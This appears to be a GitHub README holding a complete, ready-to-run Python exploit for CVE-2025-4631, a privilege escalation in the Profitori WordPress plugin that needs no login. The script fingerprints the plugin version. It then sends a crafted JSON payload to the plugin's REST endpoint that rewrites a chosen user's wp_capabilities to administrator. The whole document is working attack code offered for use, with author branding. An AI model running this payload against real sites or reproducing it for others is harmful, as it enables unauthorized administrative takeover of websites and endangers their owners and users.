README.md
Rendering markdown...
#!/usr/bin/env python3
import argparse
import requests
import json
import time
from urllib.parse import urljoin
import re
# By : Khaled Alenazi (Nxploited)
# Disable SSL warnings
requests.packages.urllib3.disable_warnings()
# Setup argument parser
parser = argparse.ArgumentParser(
description="🚨 Exploit for CVE-2025-4631 - Unauthenticated Privilege Escalation in Profitori Plugin\n# By Nxploited (Khaled Alenazi)"
)
parser.add_argument("-u", "--url", required=True, help="🌐 Target base URL (e.g., http://example.com/wordpress)")
parser.add_argument("-id", required=True, type=int, help="🆔 User ID to escalate (must exist)")
parser.add_argument("--email", default="[email protected]", help="📧 Fake user email (optional)")
parser.add_argument("--name", default="Nxploited", help="👤 Display name (optional)")
parser.add_argument("--url_field", default="https://github.com/Nxploited/", help="🔗 User profile URL (optional)")
parser.add_argument("--verbose", action="store_true", help="🔍 Enable verbose output and print JSON details")
args = parser.parse_args()
# Set custom session with User-Agent
session = requests.Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
"Content-Type": "application/json"
})
session.verify = False
# Check version
readme_url = args.url.rstrip("/") + "/wp-content/plugins/profitori/readme.txt"
print(f"[📄] Checking plugin version at: {readme_url}")
try:
resp = session.get(readme_url)
if resp.status_code == 200:
match = re.search(r"Stable tag:\s*(2\.0\.6\.0|2\.1\.1\.3)", resp.text)
if match:
print(f"[✅] Vulnerable version detected: {match.group(1)}")
print("[🚀] Exploiting in 3 seconds...")
time.sleep(3)
else:
print("[🛡️] Plugin version is not vulnerable. Exiting.")
exit()
else:
print("[⚠️] Version check failed (readme.txt not found), attempting exploit anyway...")
except Exception as e:
print(f"[⚠️] Error fetching version info: {e}\n[⏳] Proceeding with exploitation...")
# Build payload
payload = [
{
"_datatype": "users",
"id": args.id,
"wp_capabilities": "a:1:{s:13:\"administrator\";b:1;}",
"user_email": args.email,
"display_name": args.name,
"user_url": args.url_field
}
]
# Manually build API endpoint
endpoint = args.url.rstrip("/") + "/wp-json/stocktend/v1/stocktend_object"
print(f"[📡] Sending privilege escalation request to: {endpoint}")
try:
response = session.post(endpoint, data=json.dumps(payload))
if response.status_code == 200:
print("[🎯] Exploit completed successfully!\n")
try:
parsed = response.json()
print("[🧾] Updated User Information:")
for user in parsed:
print("--------------------------------------")
print(f"🆔 User ID : {user.get('id')}")
print(f"👤 Username : {user.get('user_login')}")
print(f"📧 Email : {user.get('user_email')}")
print(f"🪪 Display Name : {user.get('display_name')}")
print(f"🔗 User URL : {user.get('user_url')}")
print(f"🛡️ Role Raw : {user.get('wp_capabilities')}\n")
except Exception as json_err:
print("[❌] Could not parse JSON response:", str(json_err))
if args.verbose:
print("[Verbose JSON]\n", response.text)
print("[👑] Exploit By : Nxploited (Khaled_alenazi)")
print("🔗 GitHub : https://github.com/Nxploited")
print("📧 Email : [email protected]")
else:
print(f"[❌] Exploit failed. HTTP Status: {response.status_code}")
if args.verbose:
print("[Verbose Response]\n", response.text)
except Exception as e:
print(f"[🔥] Error during request: {e}")